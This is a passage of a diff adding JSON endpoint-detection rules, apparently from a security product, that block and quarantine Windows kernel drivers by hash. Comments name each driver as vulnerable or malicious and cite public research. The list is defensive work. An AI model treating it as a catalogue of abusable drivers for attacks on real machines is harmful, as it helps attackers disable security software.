+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814673Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd72ff8039a551994b1af86b9cf29cd33a2e262fe87c365462f54b7e5c1e9857",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c4b6a361-f204-528f-b31e-22bd040ac7c7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616450Z",
+ "creation_date": "2026-03-23T11:45:29.616454Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616460Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c2fcc0fec64d5647813b84b9049d430406c4c6a7b9f8b725da21bcae2ff12247",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c4c03d63-fe09-556c-99b6-ad0889a033f0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147024Z",
+ "creation_date": "2026-03-23T11:45:31.147026Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147031Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d0ac54d01c70483d5093a814ed0d6bb92e0b4535559d05f98bce2a23275f209f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c4c4dc37-dcd7-5c10-9016-d008dc180e36",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154804Z",
+ "creation_date": "2026-03-23T11:45:31.154806Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154811Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c3a16a8d1a4656fb6e19d64b01b7c3e31e9b22124c4e284521453550b331ea4d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c4d594d1-93c3-5b9a-b626-fe2514c9fc80",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983543Z",
+ "creation_date": "2026-03-23T11:45:29.983545Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983551Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dbfc90fa2c5dc57899cc75ccb9dc7b102cb4556509cdfecde75b36f602d7da66",
+ "comment": "Vulnerable Kernel Driver (aka cpupress.sys) [https://www.loldrivers.io/drivers/c0645f0f-9b97-4fe9-811e-2e45c250c9ef/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c4da3998-0082-5a8e-b401-9c753aeb18ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827031Z",
+ "creation_date": "2026-03-23T11:45:31.827033Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827038Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ddbd168305b26912de8728c44e8196a1c92c3930fd9871161dbffe6573029747",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c4f511fe-667a-5c2f-a6d5-ff87de3fb959",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458809Z",
+ "creation_date": "2026-03-23T11:45:30.458822Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458831Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5173b9240e9bcd0d9b25290bb0aa45d156fd5a0080841515ab44f61e0e6bd894",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c50163d2-aeaf-5c08-999d-d70c7dad9ab6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494437Z",
+ "creation_date": "2026-03-23T11:45:31.494440Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494446Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "88574aee96270d0d883f9dc11ee5682209640e18f8fea72fa176b9ab6a8f28ba",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5019506-076a-5d49-ad69-e5ce01e386b8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829752Z",
+ "creation_date": "2026-03-23T11:45:30.829754Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829760Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "71b7b595246923bfbd1adcc9f22988c3793a99a9adc6afe435604074c57c6d3d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c50ae9d1-bac1-5d26-a51a-9dc32138e6b2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829289Z",
+ "creation_date": "2026-03-23T11:45:30.829291Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829297Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fe78f1d6affe100c7726b86096c409d4b6d2ca3ce71ceae43d2aabf174f55ab2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c50b3386-4275-5ced-92c6-e8bf0cbc54d2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813400Z",
+ "creation_date": "2026-03-23T11:45:31.813403Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813411Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e420caccc500b07462e1fef97a2fa67ca2d10ec8c6a2f6fd6917dcc988b15dde",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c50b50fd-3709-503d-aa22-d02ff92c3e3b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141219Z",
+ "creation_date": "2026-03-23T11:45:31.141221Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141226Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d8509e82d8506f12b9f8cf6916eb58e15d92b0efb2f300bf5188c4ea354f28a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c50fad14-e67b-5d5d-97e5-927940c67342",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146008Z",
+ "creation_date": "2026-03-23T11:45:32.146011Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146016Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d342b077ec4b0fd3ced62d1e91911ac274c708e4ee513f52ec8f2cdd99d851f3",
+ "comment": "Malicious Kernel Driver (aka driver_0a636606.sys) [https://www.loldrivers.io/drivers/82087b26-b649-4ad1-a353-3a225c757ff7/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c511daa9-7ab4-501a-9914-52f5c4f344ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607417Z",
+ "creation_date": "2026-03-23T11:45:29.607419Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607424Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "03e0581432f5c8cc727a8aa387f5b69ff84d38d0df6f1226c19c6e960a81e1e9",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c517633c-9f86-536a-b5f5-d981528d275a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142632Z",
+ "creation_date": "2026-03-23T11:45:32.142634Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142640Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26ed45461e62d733f33671bfd0724399d866ee7606f3f112c90896ce8355392e",
+ "comment": "KingSoft Antivirus Security System Driver (aka ksapi64.sys and ksapi64_del.sys) [https://github.com/BlackSnufkin/BYOVD/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5257184-85e1-5c3e-8e45-fd0bde106e11",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480638Z",
+ "creation_date": "2026-03-23T11:45:30.480645Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480656Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd5bff03256b98922b47a2725128540953a0ac15bd2be204196917d0c707a9cb",
+ "comment": "Vulnerable Kernel Driver (aka PDFWKRNL.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c525aa61-ce66-55aa-939c-6df7c4443545",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811417Z",
+ "creation_date": "2026-03-23T11:45:31.811419Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811425Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "071b0aa6f5eafe164f0642cf7cbb2ca27f890ce5210133efa2fd2e5c3ec60c88",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c52d3080-6a79-5c30-8c36-b7f1ed4ea1cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836415Z",
+ "creation_date": "2026-03-23T11:45:30.836417Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836423Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c22480fd746fd8fcd2fb1cc8bcd599759805be1b50e1ff0acefdb6395f1659ab",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c52f0d3f-fb35-59a4-9d25-0a7505ebd61b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150036Z",
+ "creation_date": "2026-03-23T11:45:31.150038Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150043Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "59e264faab9e0716c5ebcdc8feb361f9f82a616840f6149fb7591949b697c4cf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c530da92-e1bf-5f7b-a67c-1896379e8746",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619700Z",
+ "creation_date": "2026-03-23T11:45:29.619702Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619707Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "326b53365f8486c78608139cac84619eff90be361f7ade9db70f9867dd94dcc9",
+ "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c53438da-046e-5ee7-9044-5eaba2d518d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458927Z",
+ "creation_date": "2026-03-23T11:45:30.458930Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458939Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "71701c5c569ef67391c995a12b21ca06935b7799ed211d978f7877115c58dce0",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c53cc170-7ff5-50a0-b1ae-8c7fee6ee915",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476499Z",
+ "creation_date": "2026-03-23T11:45:31.476503Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476513Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "037701c562e9c44897b9e37b2e5cb4f16b5420e1bc17ffc2d4d53f314400275e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c55590fa-a151-554a-9f90-c5b100baf586",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985777Z",
+ "creation_date": "2026-03-23T11:45:29.985779Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985785Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8807e365be2813b7eccd2e4c49afb0d1e131086715638b7a6307cd7d7e9556c",
